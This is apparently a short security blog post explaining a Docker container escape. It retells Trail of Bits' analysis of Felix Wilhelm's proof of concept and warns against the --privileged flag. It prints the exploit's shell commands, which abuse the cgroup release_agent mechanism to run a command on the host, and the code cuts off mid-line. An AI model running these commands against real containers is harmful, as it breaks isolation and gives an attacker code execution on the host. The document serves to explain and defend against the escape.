Understanding Docker container escapes
#Network & Cloud#Cloud Security
Cloud Custodian (c7n) is a rules engine for managing public cloud accounts and resources with a focus on security, compliance, and cost optimization.
Trail of Bits Recently Completed a Security Assessment of Kubernetes
Trail of Bits recently completed a security assessment of Kubernetes, focusing on its interaction with Docker. The recent tweet by Felix Wilhelm, showcasing a Proof of Concept (PoC) for a "container escape," piqued our interest. We had conducted similar research and were eager to understand how this PoC could affect Kubernetes.
Felix’s tweet illustrates an exploit that enables the launch of a process on the host system from within a Docker container that is executed with the --privileged flag.
The PoC Achieves This by Exploiting a Linux Feature
The PoC achieves this by taking advantage of the Linux cgroup v1 "notification on release" feature. Below is a version of the PoC that executes the 'ps' command on the host:
# Spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash
d=`dirname $(ls -x /s*/fs/c*/*/r* | head -n1)`
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c > $d/release_agent; printf '#!/bin/sh
ps >'
Understanding the Security Implications of the --privileged Flag
The --privileged flag raises significant security concerns. Exploits take advantage of this by launching a Docker container with the flag enabled. When this flag is used, containers gain complete access to all devices and resources on the host system.
